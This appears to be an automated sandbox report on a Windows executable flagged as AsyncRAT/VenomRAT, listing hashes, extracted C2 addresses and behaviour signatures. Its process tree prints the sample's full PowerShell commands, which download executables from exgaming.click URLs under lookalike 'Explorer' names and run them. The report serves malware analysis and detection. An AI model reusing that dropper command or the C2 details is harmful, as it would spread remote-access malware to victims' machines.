Overview

overview

10

Static

static

10

d000032653...9a.exe

windows7-x64

10

d000032653...9a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    18-08-2024 19:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe

  • Size

    75KB

  • MD5

    6c86e854bfcffef8c6b156ff59c5d6d3

  • SHA1

    8f9bd0ba4912b99de55922c91919a4df106d2278

  • SHA256

    d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a

  • SHA512

    b03618095eb784422bb3ae600784e087cc517139cdd5bb5b93ba25d9f69e1e7da844ea779b7056e5a9b5c015ca706b55b502128224804c29fab7cd6a56be1fbf

  • SSDEEP

    1536:02kU8UnRCE8PMRkkUJy8jd1bK/K9Ina4kzkLLVclN:0vUJR6PMRkHJ9d1bK3a4kiBY

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

109.38.143.137:8888

89.99.115.113:8888

192.168.178.69:8888
Mutex

zwkzzurhbadjvo

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • VenomRAT 1 IoCs

    Detects VenomRAT.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
    "C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2996
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2372

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    346d17493b278f8aaa41fc2cfe23ffe1

    SHA1

    a5634365f5d36eac142ee28b8c7ad5c684bbff69

    SHA256

    ef27c2ecb1dc622457e1eb280b111b8df1ade1c6f1b71e586cab1147bc746858

    SHA512

    611afa640e3b9811181bf7b543a8641f6b00bae886c3d10df6b05882c2882437dc6c1d999aa8ac47ffb2592bffac643e9925f9fec711667417b89f541e82d604

    Download Submit

  • memory/2572-8-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2572-9-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2692-0-0x000007FEF5A73000-0x000007FEF5A74000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2692-1-0x0000000001050000-0x0000000001068000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2692-7-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2692-22-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2996-15-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2996-16-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download